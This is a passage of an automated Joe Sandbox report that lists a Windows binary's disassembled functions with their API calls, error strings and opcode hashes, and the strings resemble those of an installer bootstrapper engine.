                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 99b6240346143be2e3dfda900a22708fa36d8d1bec557d38e449bc78874bf1bc
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D1418B31800708FBDF22AEA4CC16AAF7BBAFFA1314F148419F519E1265D771DA609E52
                                                                                                                                                                                                                                                                                                  Function 008A6C29 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 114COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,name,000000FF,00000000,00000000,00000000,?,771ADFD0), ref: 008A6C88
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,email,000000FF), ref: 008A6CA5
                                                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 008A6CE3
                                                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 008A6D27
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: String$CompareFree
                                                                                                                                                                                                                                                                                                  • String ID: email$name$uri
                                                                                                                                                                                                                                                                                                  • API String ID: 3589242889-1168628755
                                                                                                                                                                                                                                                                                                  • Opcode ID: ecaadd9c3e8851966a36f8dae2700e3a0dd7e5f7794089d13e16d3b343274333
                                                                                                                                                                                                                                                                                                  • Instruction ID: 98acd9b3f26d92b5f6f0d2f0483302c5cb740f0f2284dd2d6f6eadd42fc62ad7
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ecaadd9c3e8851966a36f8dae2700e3a0dd7e5f7794089d13e16d3b343274333
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7B418E31A01219BBEB119B94CD44FADB774FF06725F2842A8E920EB694E7359E20DB50
                                                                                                                                                                                                                                                                                                  Function 0086F451 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 109stringCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • _MREFOpen@16.MSPDB140-MSVCRT ref: 0086F48A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00864115: CreateDirectoryW.KERNELBASE(?,840F01E8,00000000,00000000,?,0087A0E8,00000000,00000000,?,00000000,008653BD,00000000,?,?,0086D5B5,?), ref: 00864123
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00864115: GetLastError.KERNEL32(?,0087A0E8,00000000,00000000,?,00000000,008653BD,00000000,?,?,0086D5B5,?,00000000,00000000), ref: 00864131
                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(008AB500,00000000,00000094,00000000,00000094,?,?,008704BF,swidtag,00000094,?,008AB518,008704BF,00000000,?,00000000), ref: 0086F4DD
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A4DB3: CreateFileW.KERNEL32(008AB500,40000000,00000001,00000000,00000002,00000080,00000000,008704BF,00000000,?,0086F4F4,?,00000080,008AB500,00000000), ref: 008A4DCB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A4DB3: GetLastError.KERNEL32(?,0086F4F4,?,00000080,008AB500,00000000,?,008704BF,?,00000094,?,?,?,?,?,00000000), ref: 008A4DD8
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • swidtag, xrefs: 0086F49D
                                                                                                                                                                                                                                                                                                  • Failed to create regid folder: %ls, xrefs: 0086F525
                                                                                                                                                                                                                                                                                                  • Failed to write tag xml to file: %ls, xrefs: 0086F51B
                                                                                                                                                                                                                                                                                                  • Failed to allocate regid folder path., xrefs: 0086F53C
                                                                                                                                                                                                                                                                                                  • Failed to allocate regid file path., xrefs: 0086F535
                                                                                                                                                                                                                                                                                                  • Failed to format tag folder path., xrefs: 0086F543
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CreateErrorLast$DirectoryFileOpen@16lstrlen
                                                                                                                                                                                                                                                                                                  • String ID: Failed to allocate regid file path.$Failed to allocate regid folder path.$Failed to create regid folder: %ls$Failed to format tag folder path.$Failed to write tag xml to file: %ls$swidtag
                                                                                                                                                                                                                                                                                                  • API String ID: 904508749-1201533908
                                                                                                                                                                                                                                                                                                  • Opcode ID: f33adc070983cfc4068bea6c8f9946433f5952a42af2189d46d637305a4a508a
                                                                                                                                                                                                                                                                                                  • Instruction ID: b770ae652a1ed572d5b594507f58b987a18d8b15b060ac6be4d1bc4ddb3ec7dd
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f33adc070983cfc4068bea6c8f9946433f5952a42af2189d46d637305a4a508a
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 88319C32C00619BBDF12AE98DC49B9DBBB4FF04710F114165FA11FA252D7709E50DB91
                                                                                                                                                                                                                                                                                                  Function 008753E2 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 91synchronizationCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,0002BF20,?,F0000003,00000000,00000000,?,00000000,00000000,00000000,0086548E,00000000,00000000,?,00000000), ref: 0087548B
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00864C61,?,?,00000000,?,?,?,?,?,?,008AB4A0,?,?), ref: 00875496
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to write exit code to message buffer., xrefs: 00875406
                                                                                                                                                                                                                                                                                                  • Failed to wait for child process exit., xrefs: 008754C4
                                                                                                                                                                                                                                                                                                  • Failed to post terminate message to child process., xrefs: 00875476
                                                                                                                                                                                                                                                                                                  • Failed to post terminate message to child process cache thread., xrefs: 0087545A
                                                                                                                                                                                                                                                                                                  • pipe.cpp, xrefs: 008754BA
                                                                                                                                                                                                                                                                                                  • Failed to write restart to message buffer., xrefs: 0087542E
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLastObjectSingleWait
                                                                                                                                                                                                                                                                                                  • String ID: Failed to post terminate message to child process cache thread.$Failed to post terminate message to child process.$Failed to wait for child process exit.$Failed to write exit code to message buffer.$Failed to write restart to message buffer.$pipe.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 1211598281-2161881128
                                                                                                                                                                                                                                                                                                  • Opcode ID: d8dbac8b5f8c399cb2b95e511d043e817f101951a9fe44136701ffcc088205d7
                                                                                                                                                                                                                                                                                                  • Instruction ID: c27efd6bef7e535949b56d74391a4e97bb8cefeaac6382275193a2dc82388f89
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d8dbac8b5f8c399cb2b95e511d043e817f101951a9fe44136701ffcc088205d7
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CE214772800A3AB7DF225B549C02E9E7728FB00721F108251F918F6295D774ED4086E9
                                                                                                                                                                                                                                                                                                  Function 00879098 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 89fileCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000005,00000000,00000003,08000000,00000000,00000000,00000101,?,00879F04,00000003,000007D0,00000003,?,000007D0), ref: 008790B2
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00879F04,00000003,000007D0,00000003,?,000007D0,00000000,000007D0,00000000,00000003,00000000,00000003,000007D0,00000001,?), ref: 008790BF
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,00879F04,00000003,000007D0,00000003,?,000007D0,00000000,000007D0,00000000,00000003,00000000,00000003,000007D0,00000001), ref: 00879187
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to open payload at path: %ls, xrefs: 00879103
                                                                                                                                                                                                                                                                                                  • Failed to verify hash of payload: %ls, xrefs: 00879172
                                                                                                                                                                                                                                                                                                  • cache.cpp, xrefs: 008790F6
                                                                                                                                                                                                                                                                                                  • Failed to verify catalog signature of payload: %ls, xrefs: 0087914E
                                                                                                                                                                                                                                                                                                  • Failed to verify signature of payload: %ls, xrefs: 0087912F
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                                                                                  • String ID: Failed to open payload at path: %ls$Failed to verify catalog signature of payload: %ls$Failed to verify hash of payload: %ls$Failed to verify signature of payload: %ls$cache.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 2528220319-2757871984
                                                                                                                                                                                                                                                                                                  • Opcode ID: e7d76b01a80af353489b63443ffc25af76d8827cc3aec5a993e0da7c86bb883b
                                                                                                                                                                                                                                                                                                  • Instruction ID: d30fccd5ddf725a738f06f1c66fbfe58203dac71a5fc9875aeb976b29affe859
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e7d76b01a80af353489b63443ffc25af76d8827cc3aec5a993e0da7c86bb883b
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3221F632540627B7DB221A688C89F9A7B28FF40770F51C211FC58E62949329DC31DBE1
                                                                                                                                                                                                                                                                                                  Function 00866B1E Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 88COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00866B69
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00866B73
                                                                                                                                                                                                                                                                                                  • GetVolumePathNameW.KERNEL32(?,?,00000104), ref: 00866BB7
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00866BC1
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast$DirectoryNamePathVolumeWindows
                                                                                                                                                                                                                                                                                                  • String ID: Failed to get volume path name.$Failed to get windows directory.$Failed to set variant value.$variable.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 124030351-4026719079
                                                                                                                                                                                                                                                                                                  • Opcode ID: a53f1c4f09f3eac12fb121d04e74b09c67d3f7286c3428bcbeaf7c6220e4b8b8
                                                                                                                                                                                                                                                                                                  • Instruction ID: d15f39b4b70163c3198c3372ca9684011bbb512a6b8a23f5e44347abb9c98660
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a53f1c4f09f3eac12fb121d04e74b09c67d3f7286c3428bcbeaf7c6220e4b8b8
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1C21F973E41639A7E720A6548D06F9B77ACFB01B20F024175BD04F7242FA74AE404AE6
                                                                                                                                                                                                                                                                                                  Function 00869C6D Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 82COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • _MREFOpen@16.MSPDB140-MSVCRT ref: 00869C88
                                                                                                                                                                                                                                                                                                  • GetFileAttributesW.KERNEL32(00000000,000002C0,?,00000000,00000000,000002C0,00000100,00000000,000002C0,?,0086A895,00000100,000002C0,000002C0,?,000002C0), ref: 00869CA0
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0086A895,00000100,000002C0,000002C0,?,000002C0,00000100,000002C0,000002C0,00000100), ref: 00869CAB
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to format variable string., xrefs: 00869C93
                                                                                                                                                                                                                                                                                                  • Failed to set variable., xrefs: 00869D2B
                                                                                                                                                                                                                                                                                                  • Failed get to file attributes. '%ls', xrefs: 00869CE8
                                                                                                                                                                                                                                                                                                  • File search: %ls, did not find path: %ls, xrefs: 00869CFD
                                                                                                                                                                                                                                                                                                  • search.cpp, xrefs: 00869CDB
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AttributesErrorFileLastOpen@16
                                                                                                                                                                                                                                                                                                  • String ID: Failed get to file attributes. '%ls'$Failed to format variable string.$Failed to set variable.$File search: %ls, did not find path: %ls$search.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 1811509786-2053429945
                                                                                                                                                                                                                                                                                                  • Opcode ID: 8624c953bafc4fcbcc806854e6ac1194eddf536a85f642e189e046cb7276a4fd
                                                                                                                                                                                                                                                                                                  • Instruction ID: d4d24f6d2138aa8c9f3c1f178dc240a03d442f1000d490c1e45bbde8b55bf7fd
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8624c953bafc4fcbcc806854e6ac1194eddf536a85f642e189e046cb7276a4fd
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5E212633940624BAFB211A988C46FAEB65CFF12761F120221FD54F66D0D7755D1096D2
                                                                                                                                                                                                                                                                                                  Function 0087AD40 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 65COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • TlsSetValue.KERNEL32(?,?), ref: 0087AD57
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0087AD61
                                                                                                                                                                                                                                                                                                  • CoInitializeEx.OLE32(00000000,00000000), ref: 0087ADA0
                                                                                                                                                                                                                                                                                                  • CoUninitialize.OLE32(?,0087C721,?,?), ref: 0087ADDD
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to pump messages in child process., xrefs: 0087ADCB
                                                                                                                                                                                                                                                                                                  • Failed to set elevated cache pipe into thread local storage for logging., xrefs: 0087AD8F
                                                                                                                                                                                                                                                                                                  • Failed to initialize COM., xrefs: 0087ADAC
                                                                                                                                                                                                                                                                                                  • elevation.cpp, xrefs: 0087AD85
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorInitializeLastUninitializeValue
                                                                                                                                                                                                                                                                                                  • String ID: Failed to initialize COM.$Failed to pump messages in child process.$Failed to set elevated cache pipe into thread local storage for logging.$elevation.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 876858697-113251691
                                                                                                                                                                                                                                                                                                  • Opcode ID: 045f90384cf2976216b2e822e2412864f94ac2da4f962be6e2e81c93568eeac9
                                                                                                                                                                                                                                                                                                  • Instruction ID: 00104d7d95b1714daa1ac3658965cea0acbc8d67ddeb1cdacf963cd6fa531e09
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 045f90384cf2976216b2e822e2412864f94ac2da4f962be6e2e81c93568eeac9
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9C112332941635BB973A1758CC0999EBEA8FF46B627018116FD04F7B10EB60DC0086D2
                                                                                                                                                                                                                                                                                                  Function 00865CE2 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 54registryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,?,00000000,CommonFilesDir,?,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion,00020119,00000000), ref: 00865D68
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A10B5: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 008A112B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A10B5: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 008A1163
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: QueryValue$Close
                                                                                                                                                                                                                                                                                                  • String ID: +$CommonFilesDir$Failed to ensure path was backslash terminated.$Failed to open Windows folder key.$Failed to read folder path for '%ls'.$ProgramFilesDir$SOFTWARE\Microsoft\Windows\CurrentVersion
                                                                                                                                                                                                                                                                                                  • API String ID: 1979452859-3209209246
                                                                                                                                                                                                                                                                                                  • Opcode ID: b6fa72b91413503e8f4e86baab047ef1bf97eb075af915b2cf3b6ebf49f956bc
                                                                                                                                                                                                                                                                                                  • Instruction ID: ca1c6b1337d4d35d5f8ef93615542425f79b776162071c52706772e720942ac9
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b6fa72b91413503e8f4e86baab047ef1bf97eb075af915b2cf3b6ebf49f956bc
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FA01F932945B29F7DB125698CC0AE9E7768FF02720F164165F901F6AA1C7758E0096D1
                                                                                                                                                                                                                                                                                                  Function 0088A271 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 174COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • SetFileAttributesW.KERNEL32(?,00000000,?,00000000,?,?,?,?,00000000,00000000), ref: 0088A33E
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,00000000,00000000), ref: 0088A348
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed attempt to download URL: '%ls' to: '%ls', xrefs: 0088A425
                                                                                                                                                                                                                                                                                                  • Failed to clear readonly bit on payload destination path: %ls, xrefs: 0088A377
                                                                                                                                                                                                                                                                                                  • :, xrefs: 0088A3C1
                                                                                                                                                                                                                                                                                                  • download, xrefs: 0088A308
                                                                                                                                                                                                                                                                                                  • apply.cpp, xrefs: 0088A36C
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AttributesErrorFileLast
                                                                                                                                                                                                                                                                                                  • String ID: :$Failed attempt to download URL: '%ls' to: '%ls'$Failed to clear readonly bit on payload destination path: %ls$apply.cpp$download
                                                                                                                                                                                                                                                                                                  • API String ID: 1799206407-1905830404
                                                                                                                                                                                                                                                                                                  • Opcode ID: 1232fc6e0b6b0c1fd23f32937c39b2855c6f03f219a120a574e439801ab18c5b
                                                                                                                                                                                                                                                                                                  • Instruction ID: a473300050bd98f47d9a15e70b14c15f009d2741267b1732f8c15fd36cf6cfa7
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1232fc6e0b6b0c1fd23f32937c39b2855c6f03f219a120a574e439801ab18c5b
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 94517275A00619AFEB25EF98C841EAEB7B4FF14710F14815AE914EB381E375DE40CB92
                                                                                                                                                                                                                                                                                                  Function 008A6EFF Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 159COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,771ADFD0,000000FF,type,000000FF,?,771ADFD0,771ADFD0,771ADFD0), ref: 008A6F55
                                                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 008A6FA0
                                                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 008A701C
                                                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 008A7068
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: String$Free$Compare
                                                                                                                                                                                                                                                                                                  • String ID: type$url
                                                                                                                                                                                                                                                                                                  • API String ID: 1324494773-1247773906
                                                                                                                                                                                                                                                                                                  • Opcode ID: 97920cd2f7c6111961ee096ee9626386821529b75969310a8721c25885c4f4fd
